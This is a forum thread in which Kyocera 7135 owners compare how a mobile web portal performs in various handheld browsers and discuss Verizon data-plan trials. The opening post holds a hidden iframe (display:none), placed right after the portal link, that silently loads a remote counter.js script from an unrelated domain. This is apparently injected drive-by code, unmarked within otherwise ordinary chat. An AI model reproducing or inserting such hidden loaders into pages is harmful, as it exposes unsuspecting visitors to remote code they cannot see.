+ Reply to Thread

Great mobile portal for 7135

I have been looking high and low for sites to try out the EIS browser. Finally, I found this great mobile portal. Try it out...

http://www.evmo.com/palm<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

This is a *really* impressive portal. Allows finding all sorts of stuff based on your zip code, and directly dialing the phone numbes with hyperlinks!

Yes, it is nice. It also works nicely on Blazer. Too bad it doesn't work with Eurdora Web. It is so text-based that it would be a natural for it.

Originally posted by Beryl
    Yes, it is nice. It also works nicely on Blazer. Too bad it doesn't work with Eurdora Web. It is so text-based that it would be a natural for it.
    And why is that? I jsut tried to connect and it fails? Go figure. Not one browser works with this portal that came with 7135. Sheez.

I tried it on both Xiino and Blazer.... looks pretty ugly on Xiino, but very nice in Blazer. Has anyone tried EIS? (comes with the 7135)
    Please visit my picture site: Robert-O-Rama :)

Originally posted by Robert K.
    I tried it on both Xiino and Blazer.... looks pretty ugly on Xiino, but very nice in Blazer. Has anyone tried EIS? (comes with the 7135)
    I tried and after the 3rd time of dumping me off when I changed fields I gave up. That and can you say "S L O WWWWW". The site is pretty cool and like Beryl said very text based and should be ideal for Eudora. Go figure.

I guess I should also add that I can connect with Eudora but I can't log in, it keeps giving me some funky error screen and refers me to MSFT

I was able to access this site with EIS and get logged in and browse the site. It is formatted nicely in EIS, but as KevinW pointed out, it is very slow to load. Of course you have to realize that I am still accessing the web at 2G data speeds.
    Dave

Originally posted by dwdod
    Of course you have to realize that I am still accessing the web at 2G data speeds.
    Oh yeah, I almost forgot that I was accessing it using Vision (but would MUCH rather access it my slowly using a 7135!)

Dave (and other QNC users for whom EN is available), does Verizon not offer any kind of free/discounted "trial" period to try to entice you to move up to EN? (if they don't I think that's short sighted... if they are going to let people continue to go the cheaper route... that they are used to, they should at least give you an incentive to move up to EN).
    Please visit my picture site: Robert-O-Rama :)

Originally posted by dwdod
    I was able to access this site with EIS and get logged in and browse the site. It is formatted nicely in EIS, but as KevinW pointed out, it is very slow to load. Of course you have to realize that I am still accessing the web at 2G data speeds.
    Got it to load on EIS. Looked good, although it kept asking me for my User name and password (even after registering and logging in) and I got frustrated with it.

Attempted to load in Xiino...it wouldn't.
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Oh yeah, I almost forgot that I was accessing it using Vision (but would MUCH rather access it my slowly using a 7135!)

Dave (and other QNC users for whom EN is available), does Verizon not offer any kind of free/discounted "trial" period to try to entice you to move up to EN? (if they don't I think that's short sighted... if they are going to let people continue to go the cheaper route... that they are used to, they should at least give you an incentive to move up to EN).
    I was using QNC

I'm running @ slow speeds also.

It worked better when registering from the desktop first. Also, Blazer is configured with "no images" since I usually don't needed it.

Wish it could be accessed via wap or PQA. It is a very nice portal -- one of the best I've seen.

VERY nice portal. I have been playing around with it on my desktop.

Couldn'tt get it to acknowldge my UN/PW on the 7135 using EIS.

Then I refreshed the page on EIS and it came up.

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Yes, you get 1st month of EN unlimited for free as a trial period.

Alan

Originally posted by alanb
    Yes, you get 1st month of EN unlimited for free as a trial period.
    Is the first month still free if you only sign up for their $30/month add-on plan?

Best browser for this site: Avantgo
    (Free, fast and no EIS quirks.)
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

Originally posted by Rambler
    Is the first month still free if you only sign up for their $30/month add-on plan?
    Sign up for the free month. Set a reminder to turn off the unlimited plan before your 30 days are up. Tell them you want to get the $30 a month plan instead when you call to turn off the unlimited. That way you get to test it out. Just don't forget to turn off the before the trial ends, else you'll get charged for it the next month.
    ---------------
    The same thing we do every night, Pinky...